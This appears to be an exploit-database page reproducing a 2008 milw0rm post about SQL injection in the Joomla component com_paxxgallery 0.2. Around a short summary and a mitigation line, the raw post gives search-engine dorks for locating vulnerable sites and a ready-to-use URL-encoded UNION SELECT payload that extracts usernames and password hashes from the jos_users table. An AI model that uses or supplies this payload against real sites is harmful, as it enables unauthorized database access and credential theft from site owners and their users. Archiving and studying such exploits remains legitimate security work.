Joomla SQL Injection (com_paxxgallery)

vendor:

PAXXGallery

by:

S@BUN

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: PAXXGallery

Affected Version From: 0.2

Affected Version To: 0.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:tobias_floery:paxxgallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla

2008

Joomla SQL Injection (com_paxxgallery)

A SQL injection vulnerability exists in the com_paxxgallery component of Joomla. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. This vulnerability can be exploited by sending a specially crafted HTTP request containing malicious SQL queries to the vulnerable application.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the application.

Source

Exploit-DB raw data:

###############################################################
#
# joomla SQL Injection(com_paxxgallery)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
# http://www.hackturkiye.com
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
#
################################################################
#
# DORK 1 : allinurl: com_paxxgallery "iid"
#
# DORK 2 : allinurl: com_paxxgallery "userid"
#
################################################################
EXPLOIT :

AFTER userid ADD EXPLÄ°OT(USERÄ°D DEN SONRA EXPLOÄ°T EKLE)

EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOÄ°T

EXPLOIT==

S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users


################################################################
# S@BUN                i AM NOT HACKER           S@BUN
################################################################

	<name>paxxgallery</name>
	<author>Tobias Floery</author>
	<copyright>(c) Tobias Floery</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
	<authorEmail>tobias@floery.net</authorEmail>

	<authorUrl>www.floery.net</authorUrl>
	<version>0.2</version>
	<creationDate>07.01.2006</creationDate>
	<description>
		<![CDATA[
		<h1>The PHP AjaX Gallery</h1>
		PAXXGallery is a PHP and JS Gallery Component for Joomla using AJAX Technology. 
		The component is designed to work even with Safe- Mode: ON! servers and a FTP Upload is integrated.
		]]>
	</description>

# milw0rm.com [2008-02-14]